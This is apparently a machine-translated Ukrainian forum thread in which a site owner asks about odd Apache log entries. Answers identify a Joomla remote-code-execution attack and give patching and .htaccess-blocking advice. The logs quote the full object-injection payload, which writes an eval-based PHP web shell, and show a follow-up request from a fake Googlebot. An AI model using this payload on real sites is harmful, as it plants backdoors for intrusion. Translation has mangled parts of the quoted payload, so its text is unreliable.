Чи використовувалася ідентифікація агента-користувача для якоїсь техніки скриптингових атак?

Записи журналу доступу Apache на моєму сайті зазвичай такі:

207.46.13.174 - - [31 / жовтня 2016: 10: 18: 55 +0100] "GET / contact HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (сумісний; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

тож ви можете побачити поле користувача-агента там. Але сьогодні я також знайшов поле користувача-агента, яке використовується таким чином:

62.210.162.42 - - [31 / жовтень 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ тест | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0відключитиHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT "" ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; якщо (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; s: 19: " cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0зв'язок "; b: 1;} ~ Ů" 3030 BYPASS 10.10.36.125:104 0,304

Це був напад? Здається, що наступний запис журналу успішно отриманий (код 200) файл, sqlconfigbak.phpзгаданий у сценарії. Хоча я не можу знайти файл у файловій системі:

62.210.162.42 - - [31 / жовтня 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (сумісний; Googlebot / 2.1; + http: //www.google.com/bot.html) "0,244 BYPASS 10.10.36.125:104 0.244

Будь ласка, що тут відбувалося?

Це атака Joomla 0 днів. Інформацію можна знайти тут: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

Це не тест на вразливість, незважаючи на __test. Це напад.

Переконайтеся, що будь-яка установка Joomla є максимально актуальною.

Інший варіант - просто використовувати .htaccess для перехоплення цього подвигу, шукаючи загальну рядок, "__test" спрацював би і перенаправляв на якесь інше місце.

IP-адресу, яку ви зв'язали, не відповідає імені хоста Google, тому це не Google. Людина або бот сканує ваш сайт на предмет вразливості. Перший - це спроба знайти вразливість Joomla.

Ці події є регулярними явищами на більшості веб-сайтів. Ви повинні переконатися, що ви дотримуєтесь кращих практик і загартуєте веб-сайт, процес тривалий, і вам потрібно буде знайти та дотримуватися онлайн-підручника.

Крім інших відповідей, зверніть увагу, що ця атака, мабуть, спрацювала, говорить про те, що ви використовуєте стару, незахищену версію PHP. Виправлення помилки, яку використовує ця атака, було випущено у вересні 2015 року. Запустіть процес оновлення та переконайтеся, що він використовує найновішу версію PHP. І перевірте наявність інших застарілих програм, які мають Інтернет, оскільки, здається, ваш сервер не оновлювався щонайменше рік.